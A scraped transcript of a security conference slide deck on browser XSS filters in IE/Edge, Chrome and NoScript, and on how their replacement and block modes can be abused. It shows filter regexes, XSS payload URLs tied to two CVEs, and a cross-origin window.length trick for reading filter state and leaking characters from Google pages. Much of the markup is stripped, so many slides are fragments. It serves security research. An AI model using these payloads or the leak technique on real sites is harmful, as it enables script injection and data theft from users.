USAGE OF XSS FILTER

View Slide

❶
➌
❷
❹
Agenda

View Slide

View Slide

XSS Filter?
https://example.com/?q=">

">

View Slide

Support
https://addons.mozilla.org/ja/firefox/addon/noscript/

View Slide

How to Control
HTTP/1.1 200 OK
Date: Tue, 28 Mar 2017 06:16:00 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

View Slide

X-XSS-Protection

View Slide

How to control NoScript
X-XSS-Protection

View Slide

Basic Behavior
https://example.com/#5382863726995448701

">
">

View Slide

Behavior of block mode

View Slide

Filter Mechanism of IE/Edge
">


View Slide

Filter Mechanism of XSS Auditor
">


View Slide

Filter Mechanism of NoScript
https://example.com/#5382863726995448701

View Slide

False Positives and Filter
<script> - Google Search
(function(){window.google={kEI: [...] https://www.google.co.jp/search?q=<script> 

View Slide

Filter's Risk

 if(jQuery){ // Expected }else{ // ??? } 
https://example.com/?

View Slide

ABUSING
FILTER's
Replacement
Mode

View Slide

{{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{$}.*?{$}}
[...]
{(v|(?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(?0
*((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(?0*((83)|(53)
|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(?0*((67)|(43)|(99)|(63)
);?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(?0*((82)|(52)|(114)|(72));?))([\t]|
(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9
|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|
A|D);?)|(tab;)|(newline;))))*(t|(?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta
b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}
{{}
{{[...]
{{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}
{[...]
Filter Regex of IE/Edge
">

View Slide

Why "> happens
[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.
">

View Slide

Why "> happens
">
[\"\'][ ]*(([^a-z0-
9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee]))
)).+?{$}.*?{$}
x="";alert(1)//"

View Slide

XSS using XSS filter means:

View Slide

Past Discoveries
https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-
2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
http://d.hatena.ne.jp/teracc/20090622

View Slide

2015: Rediscoveries
https://www.slideshare.net/masatokinugawa/xxn-en

View Slide

XXN Example
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
.+?[.].+?=
 q = "";document#body.innerHTML="<xss>"; 
URL: ?q=";document.body.innerHTML="

View Slide

XXN Example
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
.+?[.].+?=
 <script src="//example.co.jp/test.js" type="text/javascript"> 
URL: ?"/++.+++=

View Slide

Mitigation for these attacks
mode=block
"style=:\
javascript:-
vbscript:-
vbs:-
",x[]=
"{toString:
"{valueOf:
mode=block

View Slide

Strange fix
type="text/javascript">

View Slide

^ is Safe?
window#name// The execution is aborted by the syntax error
window^name// valid syntax, it is executed as JavaScript
window.name 

View Slide

View Slide

XXN using caret
(CVE-2016-3212)
url=location.search.slice(1);
if(url^indexOf(":")!=-1){
url=null;
}
onload=function(){
if(url){location=url;}
}

View Slide

ES6 and XXN
https://example.com/?q=";alert`1`//

 q = "";alert`1`//"; 
https://www.slideshare.net/x00mario/es6-en/34
ECMAScript 6 from an Attacker's Perspective
- Breaking Frameworks, Sandboxes, and everything else(by Mario Heiderich)

View Slide

XXN using back-tick characters
(CVE-2016-7280)
https://example.com/?q=${alert(1)}``//&`+++`

https://example.com/?q=[USER_INPUT]

 foo=``; q="[USER_INPUT]"; 
 foo=`#; q="${alert(1)}#`//"; 

View Slide

Now, the replacement behavior is safe?
https://example.com/?+onfiles+++=.

type="text/javascript">

[...]

View Slide

Future replacement mode
https://bugs.chromium.org/p/chromium/issues/detail?id=654794

View Slide

ABUSING
FILTER's
Block Mode

View Slide

Past found bugs in block mode
http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html
window.length
✨

View Slide

Getting the filter state
https://VICTIM/
https://VICTIM/?

IFRAME ERROR
https://ATTACKER/

win=window.open(…) if(win.length == 0){
//when filter works,
//the number of frames is "0"
}else{
//normal
}
…

View Slide

Mitigations in IE/Edge






View Slide

Abusing block mode in Google
https://www.youtube.com/watch?v=IMDWjKFbsJE

View Slide

Checking Google's Homepage
HTTP/1.1 200 OK
[...]
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
✔
✔
window.length

View Slide

Special Conditions(1)
https://accounts.google.com/ServiceLogin?

View Slide

Special Conditions(2)
google.ae
google.as
google.ca
google.co
google.co.in
google.co.jp
google.co.kr
google.co.nz
google.co.uk
google.com.br
google.com.mx
google.de
google.es
google.fr
google.it
google.pl
google.pt
google.ru
...(

View Slide

✨
Bypassing attempts limitation
✨
✨

View Slide

Another important thing
{

View Slide

Investigating filter details
0
1
2
3
4
5
6
7
8
9
10
https://example.com/

View Slide

Investigating filter details
0
1
2
3
4
5
6
7
8
9
10
https://example.com/?

View Slide

0x01-08 0x0E-1F
!"$%'()*;=^`|~
0x09-0D 0x20 +
&
>
#,/:?[\]{}
-.@_
A a
0x00
0-9 <
B-Z b-z
No reaction
Result

View Slide

Result
0x01-08 0x0E-1F
!"$%'()*;=^`|~
0x09-0D 0x20 +
&
>
#,/:?[\]{}
-.@_
A a
0x00
0-9 <
B-Z b-z
No reaction

View Slide

The Target
[email protected]
{[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

View Slide

Check Conditions
✔
✔
✔
✔

View Slide

Organizing URL for attacks
[email protected]

View Slide

Getting the number of characters
https://www.google.co.jp/?"[email protected]=

View Slide

Getting the characters
https://www.google.de/?"[email protected]=
https://www.google.ru/?"[email protected]=

View Slide

https://www.google.ca/?"[email protected]=
...
Getting the characters

View Slide

USAGE OF XSS FILTER

USAGE OF XSS FILTER

Masato Kinugawa

More Decks by Masato Kinugawa

Other Decks in Technology

Featured

Transcript